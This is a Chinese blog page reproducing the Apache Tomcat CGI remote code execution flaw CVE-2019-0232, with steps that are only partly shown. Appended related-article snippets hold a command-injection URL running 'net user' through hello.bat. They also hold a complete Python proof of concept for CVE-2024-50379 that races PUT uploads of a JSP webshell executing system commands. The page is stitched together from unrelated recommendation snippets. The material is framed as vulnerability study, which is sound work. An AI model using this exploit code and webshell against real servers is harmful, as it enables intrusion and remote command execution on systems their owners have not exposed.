Tomcat RCE 漏洞复现(CVE-2019-0232)

最新推荐文章于 2025-05-09 18:07:09 发布
原创 最新推荐文章于 2025-05-09 18:07:09 发布 · 1.3w 阅读 · 5 ·
CC 4.0 BY-SA版权
本文为博主原创文章,未经博主允许可以转载。
文章标签:

#cve #rce #漏洞

本文详细介绍了影响Tomcat 7.0.94、8.5.40及9.0.19前版本的安全漏洞,包括如何通过修改context.xml和web.xml配置文件进行利用与修复。提供了一个实战测试环境,帮助读者理解和应对此漏洞。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

漏洞影响范围,直接看官方公告:

 总结起来漏洞影响范围如下:

  1. tomcat 7.0.94之前
  2. tomcat 8.5.40之前
  3. tomcat 9.0.19之前   版本都会影响    (tomcat 服务器版本在受影响范围内的小伙伴可以打一波补丁了)

 

测试环境  tomcat 版本8.5.31   jdk版本8.121

漏洞利用前提

修改conf里面的内容

第一处:context.xml

第二处:web.xml

 

 

修改完上述两处配置文件之后,直接启动服务器即可

 

测试步骤

先确认tomcat 主页能访问

 

创建hello.bat脚本放入cgi-bin目录下

 hello.bat内容

 

 

直接浏览器访问对应的cgi-bin下的bat文件(默认会将bat文件下载回来)

 

在文件后面追加我们要执行的系统命令

可以看到 系统命令通过tomcat 已经成功执行

 

如果搭建环境有问题,可以直接下载我上传的环境

环境地址:https://download.csdn.net/download/helloexp/11125600

 

 

 

请勿利用本文章从事非法活动,仅供学习和研究

作者参与维护了一个网络安全相关的公众号 “攻防之道” ,有需要的小伙伴,可以扫码关注

 

Tomcat (CVE-2017-12615 )漏洞复现
战神/calmness的博客
05-31 1194
内容涉及点: 任意写文件漏洞 简介 原理 影响范围 复现过程 自己的心得体会 任意写文件漏洞 简介 如果Tomcat开启了PUT方法(默认关闭,有点鸡肋,但是有些页面需要PUT, 无法关闭),则有可能存在远程命令执行漏洞,攻击者可以利用PUT方法上 传jsp文件,从而造成远程命令执行,getshell等。 原理 漏洞的产生是由于配置不当(非默认配置),将配置文件( conf/web.xml)中...
Tomcat漏洞复现
ming20211016的博客
11-12 1164
进入终端:docker exec -it 76738703b7b2 /bin/bash或者/bin/sh #/bin/bash打开一个终端窗口,exit指令退出终端,但是docker容器内容一般不会安装额外的软件,所以导致大量的指令是用不了的,比如ifconfig、ps、ip addr等。这样还是麻烦,有没有一种办法,同时启动多个容器呢?有了docker-compose.yml配置文件,可以使用docker-compose up -d 指令按照配置文件里的容器和配置项去下载,执行相应的容器。
干货|最全的Tomcat漏洞复现
关注微信公众号【开源Linux】,后台回复『10T』,领取10T学习资源大放送,涵盖Linux、虚拟化、容器、云计算、网络、Python、Go等书籍和视频
09-06 1804
简介Tomcat是Apache 软件基金会(Apache Software Foundation)的Jakarta 项目中的一个核心项目,由Apache、Sun 和其他一些公司及个人共同开...
tomcat中间件漏洞复现
最新发布
m0_72199724的博客
05-09 893
而该漏洞是由于Tomcat AJP协议存在缺陷而导致,攻击者可通过构造特定参数读取webapp目录下的任意文件,如:webapp 配置文件或源代码等。先进行端口扫描发现这几个端口是开放的,8009端口的AJP协议是开启的,Tomcat版本<9.0.31,并且存在8009端口ajp服务的开启。这些权限的究竟有什么作用,详情阅读 Apache Tomcat 8 (8.5.77) - Manager App How-To。manager-script 拥有text接口的权限,和status权限。
Tomcat 漏洞复现
2301_80402555的博客
09-22 521
1、tomcat默认的conf/server.xml中配置了2个Connector,一个为 8080 的对外提供的HTTP协议端口另外一个就是默认的 8009 AJP协议端口,两个端口默认均监听在外网ip。4、文件上传成功后,默认会在网站根目录下生成和war包名称⼀致得目录,然后目录中得木马就是压缩前的文件名,Webshell客户端⼯具进⾏连接。3、制作WAR包,将JSP木马压缩为ZIP格式,然后修改后缀为war。2、首页抓包,修改为 PUT 方式提交。3、访问上传的jsp文件。4、使用工具进行连接。
CVE-2019-0232 Tomcat RCE 远程命令执行漏洞 复现环境
04-18
本附件是对CVE-2019-0232 Tomcat RCE 远程命令执行漏洞复现环境。 将文件下载到本地,直接运行tomcat 启动服务器,地址栏输入 http://localhost:8080/cgi-bin/hello.bat?c:/windows/system32/net user 即可看到...
Apache RCE漏洞复现 CVE-2021-25646
m0_62284238的博客
09-09 501
Apache Druid 是一种开源的分布式实时分析(OLAP)数据库,能够快速地处理海量的数据,并支持在线聚合和深度查询。Apache Http Server是Apache软件基金会的一个开放源码的网页服务器。Alibaba Druid 是由阿里巴巴开源的一款分布式实时大数据查询和分析系统。进入vulnhub目录下的tomcat目录,进入CVE-2021-25646目录。出现Apache Druid界面即为开启成功!攻击者通过构造数据包中的json串来控制一些敏感参数。whoami执行成功!
Apache Tomcat CVE-2019-0232 远程代码执行漏洞 - tdcoming'blog QQ group 90
08-04
2019年4月10日,Apache Tomcat官方发布了一个重要的安全公告,揭示了CVE-2019-0232漏洞,这是一个远程代码执行(RCE漏洞,主要影响Windows平台上的Apache Tomcat实例。 **漏洞简介** CVE-2019-0232是一个由于...
Tomcat RCECVE-2025-24813)复现
Neolock的博客
03-21 3417
它由 Apache 软件基金会下的 Jakarta 项目开发,是目前最流行的 Java Web 服务器之一。这里需要注意Content-Range的分块值需要与Content-Length保持一致,且大于当前文件的长度。我们都知道tomcat是Java语言开发的,所以需要JAVA环境,我这里的Java环境是1.8.0_441。当文件被上传成功后,大概30s之内payload会被自动触发,随之文件会被清除。
RCE漏洞复现
qq_43757105的博客
09-14 1128
目录 漏洞描述 漏洞等级 影响版本 准备阶段 RCE漏洞复现具体步骤: Win2008搭建好环境且ip 地址为192.168.132.132​​ Win7可以访问到在win2008 phpstudy 上提前搭建的网站​​ Win7打开bp,设置好代理访问win2008​​ send to repeater​​​​ 在请求行加一行Accept-Charset: 并且还要把“deflated”面的空格删除(不删除无法执行命令) 准备执行命令system('whoami');
Tomcat系列漏洞复现
Anubizs的博客
07-22 1131
由于 Tomcat AJP 协议设计上存在缺陷,攻击者通过 Tomcat AJP Connector 可以读取或包含 Tomcat 上所有 webapp 目录下的任意文件,例如可以读取 webapp 配置文件或源代码。此外在目标应用有文件上传功能的情况下,配合文件包含的利用还可以达到远程代码执行的危害。在Tomcat的配置文件中设置了可写(readonly=false),导致可以往服务器写文件。文件,可以看到和我们POC读取的文件是一模一样的,因此,漏洞复现成功。抓包,然后发送如下数据包,可以上传jsp。
Tomcat Session(CVE-2020-9484)反序列化漏洞复现
m0_67401545的博客
08-25 1748
北京时间2020年05月20日,Apache官方发布了 Apache Tomcat 远程代码执行 的风险通告,该漏洞编号为 CVE-2020-9484。Apache Tomcat 是一个开放源代码、运行servlet和JSP Web应用软件的基于Java的Web应用软件容器。当Tomcat使用了自带session同步功能时,使用不安全的配置(没有使用EncryptInterceptor)会存在反序列化漏洞,攻击者通过精心构造的数据包, 可以对使用了自带session同步功能的Tomcat服务器进行攻击。
[中间件漏洞]tomcat漏洞复现
紫洋的博客
06-01 1540
Tomcat运行在Windows操作系统时,且启用了HTTP PUT请求方法(例如,将 readonly 初始化参数 由默认值设置为 false),攻击者将有可能可通过精心构造的攻击请求数据包向服务器上传包含任意代 码的 JSP 文件,JSP文件中的恶意代码将能被服务器执行。导致服务器上的数据泄露或获取服务器权限。
Redis-RCE漏洞复现
Seizerz的博客
11-19 2004
一、简介 Redis:REmote DIctionary Server(Redis) 是一个由Salvatore Sanfilippo写的key-value存储系统。Redis是一个开源的使用ANSI C语言编写、遵守BSD协议、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。 Redis RCE漏洞来源:https://lorexxar.cn/201...
Apache Tomcat RCE漏洞复现CVE-2025-24813)
ANGEEK181203的博客
04-14 996
例如 Content-Range: bytes 0-1000/1200 表示文件总大小是1200字节,本次上传的是前1001字节(0-1000),后续上传剩余部分(1001-1200)。使用 partial PUT 请求将恶意的序列化数据写入到会话文件中,在开启文件会话持久化(默认存储位置),并且在文件上传未完成的情况下,内容会被临时存储在 Tomcat 的工作目录work\Catalina\localhost\ROOT。2. 在conf/context.xml中,开启File文件会话存储。
Tomcat RCE | CVE-2024-50379条件竞争RCE复现,带视频教程及POC
04-05
### 关于Tomcat CVE-2024-50379 RCE复现方法 #### 漏洞概述 Apache TomcatCVE-2024-50379 是一种基于条件竞争的远程代码执行漏洞。该漏洞允许攻击者通过特定方式上传非标准后缀的 JSP 文件,并利用服务器对大小写的不敏感特性,触发目标系统的任意代码执行[^2]。 --- #### 复现步骤说明 以下是针对此漏洞的一般性复现流程: 1. **环境准备** 攻击者需搭建一个与目标版本一致的 Apache Tomcat 测试环境,确保其配置支持文件上传功能。例如,启用 WebDAV 或其他可接受 PUT 请求的功能模块。 2. **构造恶意文件** 创建一个具有非标准扩展名(如 `.jsp_` 而不是 `.jsp`)的恶意脚本文件。此类文件通常不会被立即解析为 JSP 页面,从而绕过某些安全检测机制。 示例代码如下: ```java <%@ page import="java.util.*, java.io.*"%> <% Process p = Runtime.getRuntime().exec("id"); BufferedReader in = new BufferedReader(new InputStreamReader(p.getInputStream())); String line; while ((line = in.readLine()) != null) { out.println(line); } %> ``` 3. **并发请求操作** 使用工具发送多个 HTTP `PUT` 请求来上传上述恶意文件至目标路径;与此同时,持续向同一目录下的合法命名(即带有 `.jsp` 扩展名)的目标发起高频次访问尝试。这种行为旨在捕捉到因竞态条件而产生的短暂时间窗口,在这期间恶意文件可能被错误识别并处理成真正的 JSP 页面。 4. **验证效果** 如果一切顺利的话,则可以通过浏览器或其他客户端直接调用已部署成功的恶意程序地址完成命令注入测试工作。此时应该能够看到预期返回的结果数据包内含有所执行操作系统指令所产生的相应反馈信息。 --- #### 视频教程资源推荐 对于希望更直观了解整个过程的学习者来说,网络上有不少高质量的教学视频可供参考学习。其中就包括一篇名为《Apache Tomcat RCE 稳定复现 保姆级!(CVE-2024-50379)附视频+POC》的文章链接分享出了完整的演示录像以及配套使用的 Python 脚本来简化实际动手环节中的复杂度。 --- #### POC (Proof Of Concept) Code Example 下面给出一段简单的 python poc 实现用于辅助理解如何自动化实施以上提到的技术细节: ```python import requests, threading def upload_payload(url): headers={"Content-Type":"application/octet-stream"} with open('malicious.jsp_', 'rb') as f: r=requests.put(f"{url}/test/malicious.jsp_", data=f.read(),headers=headers) def trigger_exploit(url): while True: try: resp=requests.get(f'{url}/test/MALICIOUS.JSP') if "uid" in str(resp.content):print("[+] Exploited!");break except Exception as e:pass if __name__=='__main__': url=input("Enter target URL:") t1=threading.Thread(target=upload_payload,args=(url,)) t2=threading.Thread(target=trigger_exploit ,args=(url,)) t1.start();t2.start() ``` 注意:仅限研究用途,请勿非法使用! --- ###
评论 8
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

阿雷由

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值